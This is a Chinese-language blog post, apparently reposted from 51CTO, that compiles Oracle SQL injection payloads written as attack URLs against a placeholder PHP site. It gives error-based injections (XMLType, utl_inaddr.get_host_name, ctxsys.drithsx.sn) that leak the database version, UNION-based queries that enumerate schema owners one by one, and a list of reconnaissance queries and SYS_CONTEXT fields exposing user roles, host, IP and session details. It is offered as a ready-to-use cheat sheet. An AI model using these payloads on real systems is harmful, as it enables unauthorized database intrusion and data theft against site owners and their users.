oracle 注入整理

第一种方法http://www.xxox.cn/XXX/AA.php?id=1 and and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)- 
第二种方法http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1))– 
第三种方法http://www.xxox.com/XXX/AA.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))– 
爆库方法一：(用 and owner<>’库名’连接)http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where rownum=1),NULL from dual– 
第二个库名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and rownum=1),NULL from dual– 
第三个库名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and owner<>’SYSTEM’ and rownum=1),NULL from dual– 
依此类推直到返回正常页面: 
爆库方法二:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=1–            分割http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=2– 
有时候会重复，例如：limiti=1-10会显示同样的内容
oracle 注入信息收集

1、当前用户权限     (select * from session_roles) 
2、当前数据库版本   (select banner from sys.v_$version where rownum=1) 
3、服务器出口IP     (用utl_http.request可以实现) 
4、服务器监听IP     (select utl_inaddr.get_host_address from dual) 
5、服务器操作系统   (select member from v$logfile where rownum=1) 
6、服务器sid        (远程连接的话需要，select   instance_name   from   v$instance;) 
7、当前连接用户     (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual) 
Oracle也可以用sys_context来获取基本信息

SYS_CONTEXT(‘USERENV’,’TERMINAL’) terminal, 
SYS_CONTEXT(‘USERENV’,’LANGUAGE’) language, 
SYS_CONTEXT(‘USERENV’,’SESSIONID’) sessionid, 
SYS_CONTEXT(‘USERENV’,’INSTANCE’) instance, 
SYS_CONTEXT(‘USERENV’,’ENTRYID’) entryid, 
SYS_CONTEXT(‘USERENV’,’ISDBA’) isdba, 
SYS_CONTEXT(‘USERENV’,’NLS_TERRITORY’) nls_territory, 
SYS_CONTEXT(‘USERENV’,’NLS_CURRENCY’) nls_currency, 
SYS_CONTEXT(‘USERENV’,’NLS_CALENDAR’) nls_calendar, 
SYS_CONTEXT(‘USERENV’,’NLS_DATE_FORMAT’) nls_date_format, 
SYS_CONTEXT(‘USERENV’,’NLS_DATE_LANGUAGE’) nls_date_language, 
SYS_CONTEXT(‘USERENV’,’NLS_SORT’) nls_sort, 
SYS_CONTEXT(‘USERENV’,’CURRENT_USER’) current_user, 
SYS_CONTEXT(‘USERENV’,’CURRENT_USERID’) current_userid, 
SYS_CONTEXT(‘USERENV’,’SESSION_USER’) session_user, 
SYS_CONTEXT(‘USERENV’,’SESSION_USERID’) session_userid, 
SYS_CONTEXT(‘USERENV’,’PROXY_USER’) proxy_user, 
SYS_CONTEXT(‘USERENV’,’PROXY_USERID’) proxy_userid, 
SYS_CONTEXT(‘USERENV’,’DB_DOMAIN’) db_domain, 
SYS_CONTEXT(‘USERENV’,’DB_NAME’) db_name, 
SYS_CONTEXT(‘USERENV’,’HOST’) host, 
SYS_CONTEXT(‘USERENV’,’OS_USER’) os_user, 
SYS_CONTEXT(‘USERENV’,’EXTERNAL_NAME’) external_name, 
SYS_CONTEXT(‘USERENV’,’IP_ADDRESS’) ip_address, 
SYS_CONTEXT(‘USERENV’,’NETWORK_PROTOCOL’) network_protocol, 
SYS_CONTEXT(‘USERENV’,’BG_JOB_ID’) bg_job_id, 
SYS_CONTEXT(‘USERENV’,’FG_JOB_ID’) fg_job_id, 
SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_TYPE’) authentication_type, 
SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_DATA’) authentication_data 
例1：

http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((SYS_CONTEXT(‘USERENV’,'TERMINAL’)))–

例2：

http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,SYS_CONTEXT(‘USERENV’,'TERMINAL’),NULL from dual–

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/464568，如需转载请自行联系原作者